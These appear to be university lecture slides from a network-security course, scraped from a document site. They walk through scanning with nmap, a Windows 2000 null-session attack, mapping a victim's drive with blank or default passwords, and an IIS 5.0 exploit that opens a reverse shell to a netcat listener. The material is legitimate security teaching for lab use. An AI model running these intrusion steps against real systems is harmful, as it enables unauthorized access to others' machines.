Itp 457 Network Security Network Hacking 101



Yüklə 464 b.
tarix14.10.2017
ölçüsü464 b.


ITP 457 Network Security

  • Network Hacking 101


Hacking Methodology (review)

  • 1. Gather target information

  • 2. Identify services and ports open on the target

  • 3. Research the discovered services for known vulnerabilities

  • 4. Attempt to exploit the services

  • 5. Utilize exploited services to gain additional privileges from the target

  • 6. Reiterate steps 1-5 until goals are achieved



Network Hacking

  • Methodology changes slightly because we are focused at this point on security from the inside

  • Gather information & map the network

  • Scan systems to see what’s alive

  • Determine services running

  • Attempt to penetrate the systems (if you want )



Gathering Information

  • Upon connection to the network

    • Check your IP – normally automatically assigned
      • Windows – ipconfig
      • Linux – ifconfig


Useful information from ipconfig

  • Physical Address – your computer’s MAC address

  • IPAddress – the ip address assigned to your computer

  • Subnet Mask – the mask used to limit the number of computers on the network

  • Default gateway – the computer that is used to connect to ip addresses outside of the network

  • DHCP server – the computer that distributes IP addresses

  • DNS servers – the computer that translates domain names to IP addresses

  • IPconfig will identify between 1 and 3 computers without any scanning! (DHCP, DNS, Gateway)



“Knock-knock”

  • Ping sweep

    • Ping – ICMP “echo request” packets
    • Will return if host is reachable (alive)
  • Single command: ping host

    • Host can be an IP or a domain name (e.g. www.google.com)
  • We want to see all the hosts on our particular network

    • Nmap (or Umit)
      • nmap –sP <target range>


Ping sweep vs. port scanning

  • Why not start with port scanning?

    • Normally, ping scanning is benign and will not get you in trouble or caught
    • Port scanning is almost always seen as malicious
    • Limit the amount of time that you are port scanning by just looking at systems that are alive
    • Also, there may be multiple subnets (multiple parts of the network), with some not being occupied. A ping sweep will quickly determine if a particular IP range is up or not.


Determine Running Systems

  • Portscan the system that you want to break into

  • Nmap will give a great report, including port service numbers  very useful for determining what is vulnerable

  • Nmap will also try to tell you what operating system they are running

    • Is it always reliable?


Breaking in 

  • Once you’ve discovered what services are running, you have to see which are vulnerable

  • Determine which service you want to break, and find a vulnerability

    • Places to look: www.securityfocus.com


Null Session Hack

  • One of the oldest tricks for Windows 2000

  • Will allow any hard disk mounted in the Win2k machine to be mapped as a network drive on the hacker’s machine

  • Utilizes a vulnerability in the SMB shares

  • First, determine the IP address of the Windows 2000 machine

    • Example: 192.168.0.106


Null Session Hack Cont’d

  • Establish the null session

    • net use \\ipaddress\ipc$ “” /u:””
    • This command establishes the null session connection


Get the list of the usernames

  • The program Dumpsec will give you the usernames and a whole lot more

    • http://www.somarsoft.com/cgi-bin/download.pl?DumpAcl
    • Go to select computer, and enter the computer address
    • Go to “Dump Users as Column”, and it will give you options to add more information to the report


DumpSec



Map the network drive

  • The command “net use” can also be used to map the victim’s machine as a network drive on your computer

    • Caveat: you must know an adminstrator’s username and password
    • In our case, the user “Bob” does not have a password – typical for insecure computers
    • Another common one: username “Administrator” password “Password”
  • The command: net use Z: \\192.168.0.106\c$ “password” /u:”username



Golly!



We want more!

  • We’ve established a remote drive connection, but we cannot run any commands

  • We need either a remote shell (windows command prompt) or a remote window (VNC or terminal services)

    • Shell is easier, and does not require a lot of bandwidth


Remember the portscanning

  • IIS was installed

    • Version 5.0
  • So let’s take a look and see what’s available

    • http://www.securityfocus.com/bid/2674/info
    • Download IIS5hack from the exploit section
    • You will also need netcat http://www.vulnwatch.org/netcat/nc111nt.zip
      • Use the command: nc –l –p 1111
      • Tells netcat to listen on port 1111


The hack!

  • With netcat running, open another command prompt, and enter the command:

  • iis5hack.exe victim-ip your-ip port-number

  • example:

  • iis5hack.exe 192.168.0.106 192.168.0.100 1111

  • This will open up a remote shell in the netcat window

    • MAKE SURE THE WINDOWS FIREWALL IS TURNED OFF!!!


What have you learned?

  • Methodology of a hack

  • How to remotely map a drive from a windows 2000 machine

  • How to hack IIS 5.0



Your lab

  • Find another way to hack into a Windows 2000 machine

  • Find a way to hack into the Windows XP SP0 machine

  • Give me step-by-step instructions on how you did it. What sites did you go to? What tools did you use?




Dostları ilə paylaş:


Verilənlər bazası müəlliflik hüququ ilə müdafiə olunur ©genderi.org 2019
rəhbərliyinə müraciət

    Ana səhifə